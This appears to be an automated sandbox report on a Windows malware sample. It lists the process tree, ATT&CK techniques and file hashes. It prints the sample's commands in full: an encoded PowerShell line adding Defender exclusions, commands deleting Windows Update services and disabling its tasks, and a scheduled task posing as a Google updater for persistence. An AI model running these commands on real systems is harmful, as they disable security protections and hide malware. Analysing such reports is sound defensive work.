C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe "uscznjtdlrpzim"5⤵PID:2692
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe qogpttybmmmxi0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPrOXm4kGtEn/ZgPyjiDYwe/mu1wJod3G4ybKfriFlvX5/cPzwC+grqJRncFX2oIaCyfgQwYP6oqAsEG81+jJCQn615LfOl9vDqqzuvSeBWHLRbB6RL3NI+uQLE2uPl2hMP1A8ZJSXCp5FNSxKz+yXD/3pmbyKEb10mByCjliFLzsw6IJHQ/U/t4Cy3hKy2hsX1MrQilste7aHM98jReFRFnY9V0hpt2FRrzdOIr9eBxZhGN4MtQ85PW3WIDt7sXsgtHPZMNwMSxC2lB5EW8mN2iLaBNv9P9/d5TzNalCUJ3tYTlHZ8k+EDexjNW2vVCitBX5qi8Qcugh54x/Ok44t8DlRY2E1nTgLgybRikhw6tWq2N32fhfpRZah0llH3luDEA33V1hXU5tEIDTdTdvtWVm5LOtDaE26OtMcfemyvXEyx5Xpl2V8/t+Nf6MKdylH0uzwa03zeM0xhOOP5d3bFAKRAqB3U5av+AkNeT2EsaabE5vtWDuynU6Bb1iu+qntQ=5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2452
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:976
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:280
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:964
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:1016
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1176
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:2020
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:1916
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:1880
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:476
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:484
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"C:\Users\Admin\AppData\Local\Temp\40eeb7e6dc706f7e0eac78cc85213220N.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAeAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGgAdwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHcAbgBqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAYQBnAHMAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:2924
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:2676
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:2616
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:2636
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:2684
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:2692
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:2528
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:824
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:2980
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1276
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:1724
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:532
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:1900
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:2380
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:2576
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:1992
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:2272
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:2360
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2652
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
PID:1936
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""3⤵PID:2416
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\Google\Chrome\updater.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵PID:2516
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵PID:2228
-
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "49384658016723260351945230819-2035182398-168646351216807987814174275551674409703"1⤵PID:828
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1210583900-1864933382-504099959169151827521131715211941224944-15666506011230839723"1⤵PID:1476
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1302879950-840085889-702871329-800904320-2583387719883909082086569638-984941914"1⤵PID:2152
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1715209253-1549303545-2018470893-1593325933-1324999412-740847104-1082938555-1032977077"1⤵
- Suspicious use of SetWindowsHookEx
PID:2696
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "227570323-1575764454-14458156771985709915-1950362717-886438917-12731077391047296245"1⤵
- Suspicious use of SetWindowsHookEx
PID:2988
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Modify Registry
3Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD589705267bdaf059f6a554857043242c0
SHA1c2f26480d15e8d74b35f6426553e0be36b976cc7
SHA256332d9fd123e376d450cdef38b1eb5dfacaff32d3a506fe2e4f97462955e75f87
SHA51213b752dfe4fa4ba084c6846c8bbe44e09a96823af3883685e08e54769261098e69bc3e5de4a9d086c64584da86708804543ac60e1416e893738223526aac5a1f
-
Filesize
4.8MB
MD540eeb7e6dc706f7e0eac78cc85213220
SHA128b55166002c4ba1c9af0ec4fd9f98b591d6e498
SHA2569709d21f40cd1def7d6bb809d5e11fa948ec7290e201ae2b2a62e1bd17368548
SHA512219713374a9bbaf254fd88f1834ca82fec95228b8de3890a466079866026491381caacd4309a9b7ab278cd5e92097fdee5105bbdbddc6c0b6743a6f871f6060f
-
Filesize
1KB
MD518e4b02054fe004820525aa2841425c3
SHA19c06ad9478b70f38fa1ab94274d38e010c6bf64e
SHA256cc95c734ebe2cc9b775aaee6b540713449a4216f983c3fe8602d302ff9fbaf14
SHA512154bac0a405e3ad2cc65e9f7f3d40d9efe8ac5885f628c470490f4d08d419b575a376d75afe9c24e7f9bdf3946ba2eddec6fea7df04ff2a2b29397d846bed974
-
Filesize
1KB
MD5dfcf07aa7810781da54d5e03f523af14
SHA1857afcee0e6156372b43ef87b7cf80b6d0923094
SHA256283e9b0adf894b1d36786ab59f9d82cd9f2682b55d8cf8be3a7f726c9e206028
SHA512db013679e607e39e2d2910eed4ebe53f19fffa60f9af86a510552e068ae97387bbff6345135a478c76cd897ac03689bf01a6a5034daaa45e24d2b1633c17b5c4